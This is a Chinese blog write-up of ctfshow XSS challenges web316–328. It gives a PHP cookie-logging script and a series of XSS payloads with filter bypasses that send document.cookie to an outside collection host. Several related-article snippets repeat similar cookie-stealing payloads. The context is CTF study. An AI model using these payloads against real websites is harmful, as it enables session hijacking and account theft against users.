ctfshow XSS刷题总结

最新推荐文章于 2024-07-31 13:21:53 发布
最新推荐文章于 2024-07-31 13:21:53 发布
阅读量1k 收藏 7
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53755216/article/details/117060829
版权

简介

这次把爪牙伸到了xss 嘿嘿嘿
开始日咯!

web316

用xss平台怎么也爆不出。。。
可能是姿势不对
用最原始的方法吧
在自己的服务器上写一个hack.php

<?php
$content = $_GET[1];
if(isset($content)){
    file_put_contents('XSS/flag.txt',$content);
}else{
    echo 'no date input';
}

下边拿到后直接把cookie转发

<script>document.location.href='http://wgm1yk1.nat.ipyingshe.com/x.php?1='+document.cookie</script>

web317

今天学习了一款xss自动扫描的工具 XSStrike
在这里插入图片描述
似乎很好用的呢
直接跑出了payload 随便拉一个来看一下
额 。。。好像没看懂

<hTmL/+/OnmousEover%0d=%0d[8].find(confirm)%0dx//

还是先自己来 慢慢来 从简单的来试

<img src=x onerror=alert('xss') />

直接弹出

<img newImage().src="http://wgm1yk1.nat.ipyingshe.com/hack.php?1="+document.cookie" />

额。。。
不行 不造为啥
貌似是图片后台不会点击。。。

web318,319

利用body标签

由于这种攻击方法向量,在给定页面中只有一个body标签,有些人可能认为它不起作用,但实际上,所有浏览器都会把它当事件处理器(Event Handler)来执行。在这里,可以在onpageshow事件中用提交body元素的方法,形成XSS Payload,当其中的body元素被解析后就会触发Payload

payload

<body onload="window.location.href='http://wgm1yk1.nat.ipyingshe.com/hack.php?1='+document.cookie"</body>

web320

上一个被ban了
试试别的 开始变难哩
虽然用工具不太好 但是(真到好用

<HTml%0doNpOinTEreNteR%0d=%0dalert(1)>

<HTml%0doNpOinTEreNteR%0d=%0dwindow.location.href='http://wgm1yk1.nat.ipyingshe.com/hack.php?1='+document.cookie>

web321

这里随便选择了 select 发现过滤了空格
直接用/绕过

<body/onload="window.location.href='http://wgm1yk1.nat.ipyingshe.com/x.php?cmd='+document.cookie"></body>

web322

还可以用

<body/onload="window.location.href='http://wgm1yk1.nat.ipyingshe.com/x.php?cmd='+document.cookie"></body>

web323~6

<video><source/**/onerror=alert(1)>
<video><source/**/onerror="window.location.href='http://xxxxx.com/x.php?cmd='+document.cookie">

web327

收件人必须为admin
在留言板插 随便插

web328

<script>window.location.href='http://wgm1yk1.nat.ipyingshe.com/x.php?cmd='+document.cookie</script>

看了群主视频 学习了
思路:
看到自己能看到这个页面
在这里插入图片描述

管理员也能看到
于是在用户名和密码之中x
x完后可得到管理员cookie

中间有两个包 都可以改cookie 但第二个包更重要一点
改完后可得到flag

b1ue0cean
关注
专栏目录
ctf xss利用_一道XSS题目分析
weixin_39960147的博客
01-14 1238
目录0x00 介绍题目地址:https://challenge.intigriti.io/题目的要求是绕过CSP实现XSS,执行alert(document.domain)。0x01 解决页面中加载了个script.js:varhash=document.location.hash.substr(1);if(hash){displayReason(hash);}document.getEle...
ctf xss利用_xss总结--2018自我整理
weixin_39851809的博客
01-14 1348
0x00前言因为ctfxss的题目偏少(因为需要机器人在后台点选手的连接2333),所有写的比较少0x01xss作用常见的输出函数:print()、 print_r()、 echo、 printf()、 sprintf()、 die()、 var_dump()、 var_export()xss是往页面中添加了一段代码,并且被浏览器执行了反射型将恶意代码写入参数,或者自己服务器上搭个form表单传...
XSS总结
weixin_30888707的博客
04-09 116
XSS是什么 1.跨站攻击脚本 复制代码 xss过滤方法 输入过滤输出编码 输入验证:输入是否仅仅是合法的字符 输入字符串是否超过最大限制 输入如果是数字,是否在指定的范围内 输入是否符合格式要求:如ip地址或者email地址 输入是否过滤了敏感字...
CTFshow_XSSxss-labs全关卡万字通关笔记
最新发布
dasdasdasvsdV的博客
07-31 315
反射型非持久型,常见的就是在URL中构造,将恶意链接发送给目标用户。当用户访问该链接时候,会向服务器发起一个GET请求来访问带有恶意代码的链接。造成反射型XSS主要是GET类型。存储型持久型,常见的就是在博客留言板、反馈投诉、论坛评论等位置,将恶意代码和正文都存入服务端(数据库、内存、文件系统等),每次访问都会触发恶意代码。DOM型DOM型XSS其实是一种特殊类型的反射型XSS,也被称作本地跨站,它是基于DOM文档对象模型的一种漏洞。
CTFSHOW 刷题记录
errorr0
03-20 1363
手注sql?狗看了都摇头,当然要用脚本跑撒!!
CTFshow刷题日记-WEB-信息收集
Love&Share
09-02 3239
信息收集 web1 题目提示开发注释未及时删除,所以直接f12 web2 提示:js前台拦截 ctrl+u查看源代码 web3 提示:没思路的时候抓个包看看,可能会有意外收获 浏览器f12 network 但是在burp中需要发送两次 第一次是重定向 web4 提示:总有人把后台地址写入robots,帮黑阔大佬们引路。 这都提示到这个份上了,直接访问rebots.txt即可 访问/flagishere.txt拿到flag web5 提示:phps源码泄露有时候能帮上忙 访问index.phps文
ctfshow xss
07-31
CTFShow是一个网络安全工具,它主要用于检测网页是否存在跨站脚本攻击(XSS)漏洞。XSS(Cross-Site Scripting)是指攻击者通过恶意注入可以执行的JavaScript或其他客户端脚本到网站上,当用户浏览包含这些脚本的页面...
CTFshow XSS(web316-333)
Kradress的博客
03-18 771
这里我们发现管理员才能查看用户名和密码,如果我们在注册的时候写入xss的payload,就会在用户管理界面执行我们的xss代码。这题没有过滤什么,但是如果用img的话,拿不到flag,但是referer是bot,我猜测bot触发不了img的。试试用admin的cookie修改密码,但是没有用,可能cookie失效了。这题拿cookie也看不到flag了,不过多了一个修改密码选项。随便注册一个用户test,余额只有6块,买flag要9999元。发现输出为空,说明被题目限制了,但是。可以用frame注入。
XSS学习总结
ad12456的博客
03-28 1511
xss学习
[CTFSHOW]XSS
Huamang的博客
02-24 295
xss平台 xss平台可以解决很多题 https://xsshs.cn/ https://xss.pt/ web320-326 <body/onload=document.location='http://域名或ip/cookie.php?cookie='+document.cookie;> 这个代码就够了,执行后去日志看flag web328 有登入和注册框,可以用js代码去获取信息(参考y4) var img = new Image(); img.src = "http://your-d
CTF-入门练习题
10-30
题目来自于蓝盾服务器,难度适中,适合于练习,需要wp请留言
CTFshow刷题日记-WEB-爆破
Love&Share
09-03 3324
web21 提示:爆破什么的,都是基操 有一个zip文件,解压是一个爆破字典 Authorization: Basic dG9tY2F0OmFkbWlu ------->输入的用户名/口令以base64的形式传输。认证失败显示401 认证成功为200 将Authorization字段后面的值进行base64 解码,即可获取用户认证信息明文 使用bp的Intruder模块 payload type 选择custom iterator(自定义迭代器) 自定义迭代器可以自定义拼接方式,positio
[Web安全学习] SSTL模板注入总结
Y1seco的博客
08-18 1539
前置知识 引自 bfengj __class__ 类的一个内置属性,表示实例对象的类。 __base__ 类型对象的直接基类 __bases__ 类型对象的全部基类,以元组形式,类型的实例通常没有属性 __bases__ __mro__ 此属性是由类组成的元组,在方法解析期间会基于它来查找基类。 __subclasses__() 返回这个类的子类集合,Each class keeps a list of w
CTFshow刷题日记-WEB-文件上传
Love&Share
09-08 1500
web151-前端绕过 简单只要在前端把exts:png改成php exts:'php' 访问 /upload/shell.php?shell=system("tac ../flag.php"); web152-content-type绕过 这次不改前端了,直接在bp改,将Content-Type改成 image/png 总结下常见conten-type类型 常见的媒体格式类型如下: text/html : HTML格式 text/plain :纯文本格式 text/xml : XML格式 im
CTF-WebXSS漏洞学习笔记(附ctfshow web316-333题目)
jayq1的博客
06-07 2212
XSS
CTFshow刷题日记-WEB-SQL注入part1(171-184)
Love&Share
09-19 1141
SQL注入篇-共150道 mysql字符串函数 UPPER(s) 将字符串转换为大写 UCASE(s) 将字符串转换为大写 SUBSTRING(s, start, length) 从字符串 s 的 start 位置截取长度为 length 的子字符串 SUBSTRING_INDEX(s, delimiter, number) 返回从字符串 s 的第 number 个出现的分隔符 delimiter 之后的子串。 如果 number 是正数,返回第 number 个字符左边的字符串。
CTFshow刷题日记-WEB-黑盒测试(web380-395)文件包含、日志包含getshell、SQL注入
Love&Share
10-07 3172
web380-扫目录文件包含 扫目录,存在page.php 访问发现报错,$id参数,可能存在文件包含 /page.php?id=flag web381-读源码找后台地址 page.php已经无法文件包含 看源码有一个可疑的路径 访问这个目录,最后注意一定要带上/ web382-383弱口令加万能密码 上题的/alsckdfy/目录访问之后是个登录界面 burp抓包爆破就行了,p字段,这些都可以拿到flag web384-爆破密码 提示:密码前2位是小写字母,后三位是数字 这肯定是后台密码了,
CTF.show | Misc | 刷题日记(不定期更新)
pone2233的博客
01-22 1529
CTF.show-Misc 杂项签到 打开winhex 修改一下他 参数,因为他是伪加密 改成00 flag{79ddfa61bda03defa7bfd8d702a656e4} misc2 这个直接打开虚拟机 flag{ctfshow} miscx 解压到最后我们发现了能解压出来一个图片 这个图片我们知道了zip的密码是2020,然后获得一个音符加密 ♭‖♭‖‖♯♭♭♬‖♩♫‖♬∮♭♭¶♭‖♯‖¶♭♭‖∮‖‖♭‖§♭‖♬♪♭♯§‖‖♯‖‖♬‖‖♪‖‖♪‖¶§‖‖♬♭♯‖♭♯♪‖‖∮‖♬§♭‖
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值